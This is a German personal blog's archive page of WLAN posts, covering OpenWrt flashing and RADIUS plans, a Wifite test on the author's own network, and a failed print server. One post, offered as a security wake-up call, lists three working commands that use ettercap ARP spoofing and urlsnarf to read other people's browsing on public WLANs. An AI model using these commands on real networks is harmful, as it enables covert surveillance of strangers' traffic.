Beiträge zu “WLAN”

Openwrt Access Point mit Radius absichern - erstmal nicht :-(

Im allgemeinen werden WLANs mit einem einzigen möglichst langen und sicheren Schlüssel abgesichert. Das funktioniert für ein oder zwei Nutzer mit ein oder zwei Geräten auch gut und sicher. In Firmen WLANs ist das so nicht mehr möglich. Die Kompromittierung des eine WLAN Schlüssels sorgt dafür, das das gesamte Netz unsicher ist und alle Anwender auf allen Geräten einen neuen Schlüssel bekommen müssen.

Dafür gibt es zentrale Server Lösung z.B. Radius Server bei denen man nutzerspezifische Accounts und Kennwörter vergeben kann.

Nun haben wir bei uns zwar noch nicht viele “Mitarbeiter” aber zu den zwei Erwachsenen mit diversen Geräten kommen allgemein verfügbare Geräte hinzu. Aber vor allem wegen der “wachsenden Familienmitgliedern” würde ich gerne nutzerbasierende WLAN Kennwörter vergeben die man vielleicht dediziert sperren oder austauschen kann.

Openwrt bietet so eine Möglichkeit. Leider musst ich feststellen das das doch sehr kniffelig ist.

To make a long story short. Das Projekt wird erst einmal auf Eis gelegt und der AP wird mit WPA2 in Betrieb genommen. Erstmal stehen die Vorbereitungen für meinen Vortrag auf der Open Rhein Ruhr auf der Todo Liste ganz oben.

Kennt jemand von Euch eine ausführliche Beschreibung für einen Radius Server auf Openwrt? Bin für jeden guten Hinweis dankbar.

24.10.15
Weitere Beiträge zu: Openwrt   WLAN  

Einen TP Link N600 mit Openwrt flashen

Der aktuell vorhandene WLAN Router Linksys WRT54GL ist in die Jahre gekommen und die wachsende Anzahl von WLAN Geräte und Nutzern verlangt nach einem neueren schnelleren WLAN Access Point. Wesentliches Kriterium für die Auswahl war die Verfügbarkeit einer Openwrt Firmware. Ich erwarte/erhoffe mir hiervon zusätzliche Funktionen und über den Herstellerzyklus hinaus bereitgestellte Updates. Außerdem sollen damit auch Funktionen wir Radius Anmeldungen möglich zu sein. Aber dazu später.

Die Auswahl viel auf einen TP-LINK TL-WDR3600 N600 Hauptgründe waren positive Bericht mit Openwrt und auch die Freifunker scheinen das Gerät häufig zu verwenden.

Hier die Schritte der Installation

Zuerst ist die richtige Firmware aus dieser Liste auszusuchen und zu laden. Danach den Router einschalten und mit einem Netzwerkkabel verbinden.

Dann über

 http://192.168.0.1/

mit admin/admin anmelden und über das Menu auf der linken Seite in System Tools, Firmware Update auswählen.

TP Link Openwrt

Dann die Datei auswählen, auf Upload drücken

TP Link Openwrt

und auf den Neustart warten.

TP Link Openwrt

Nach dem Firmwarewechsel hat sich die Adresse auf auf 192.168.1.1 geändert und man kann sich mit mit Root ohne Kennwort anmelden. Danach sofort das Kennwort ändern

TP Link Openwrt TP Link Openwrt

Im nächsten Schritt wird dann Openwrt als Access Point konfiguriert

24.10.15
Weitere Beiträge zu: Openwrt   WLAN  

Mal das eigene WLAN angreifen

Schon mal eure WLAN Sicherheitseinstellungen getestet? Mit Kali Linux geht das

From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created.

Download und auf USB Stick oder CD packen. Ich habe hier einfach einen alten Netbook genommen, damit gebootet und aus den WLAN Werkzeugen Wifite gewählt. Dann die Netzwerke scannen, sein eigenes Netzwerk auswählen und laufen lassen.

Das lief jetzt 2 Tage.

alternat-txt

17.11.14
Weitere Beiträge zu: WLAN   Sicherheit  

Mitlesen wohin der Nachbar im öffentlichen WLAN so surft

Für alle die noch glauben das es wahnsinnig schwierig ist in einem öffentlichen WLAN mit zulesen was die anderen so für Webseiten besuchen - Hier ein Weckruf.

Auf einem Standard Ubuntu kann man mit folgenden 3 Zeilen genau lesen was so alles im WLAN aufgesucht wird.

sudo apt-get install dsniff ettercap-text-only
sudo urlsnarf -i wlan0 | cut -d\" -f4
sudo ettercap -T -Q -M arp -i wlan0 // //

Eine etwas ausführlichere Vorführung gibt es hier

201211-url-snifffing.png


 

22.11.12
Weitere Beiträge zu: Sicherheit   WLAN  

Wenn nach dem Urlaub das WLAN nicht mehr geht...

und man zu den Menschen gehört die den WLAN AP in Ihrem Urlaub abschalten, dann aufgepaßt. Es kann daran liegen, daß in der Zwischenzeit jemand ein neues WLAN eingerichtet hat und  "sich auf Deinen Wireless Channel gesetzt" hat. (Der ja grad frei ist)

Man kann dann seine Zeit mit WLAN Konfiguration verschwenden oder einfach mal einen anderen Channel probieren :-(

Nur so als Tipp. Nicht das mir das grad passiert wäre.

Auf dem Linksys WRT geht das z.B. hier:

201111-wlan-geht-nicht-mehr.png

4.11.11
Weitere Beiträge zu: WLAN  

Returned to Sender: Logilink Wireless Printserver PS0003

Ich wollte einen Netzwerkdrucker an einer Stelle installieren bei der ich leider vergessen hatte einen Netzwerkanschluss zu installieren. Obwohl ich von Hause aus eher ein Fan von Kabeln bin und WLAN nur zum bequemeren Surfen im Wohnzimmer benutze schien hier wohl ein WLAN Adapter das richtige zu sein und ich bestellte mir einen Wireless Printserver von Logilink.

Ich kann nur sagen: keine gute Idee-nur Probleme. Nach einer Stunde hatte ich nur mit Hilfe eines Netzwerkschnüflers Wireshark herausgefunden das dieses Teil out of the Box nicht mit DHCP arbeitet sondern auf eine IP Adresse festeingestelt war. Als ich diese Hürde überwunden hatte ist es mir in weiteren 2 Stunden nicht gelungen dieses Ding mit WPA Verschlüsselung in mein WLAN zu bekommen.

Am Ende habe ich dann eine Stunde gebraucht um ein Kabel über meinen Dachboden an die gewünschte Stelle zu bekommen. :-) Ist zwar noch etwas rustikal aber mit 2 Meter Kabelblenden ist das fertig.

23.3.10
Weitere Beiträge zu: WLAN  

Dies ist ein privater Blog von Hagen Bauer- berufstätiger Vater, Ehemann, Naturliebhaber, Läufer, Zelter, technikverliebt.


Creative Commons License
This blog is licensed under a Creative Commons License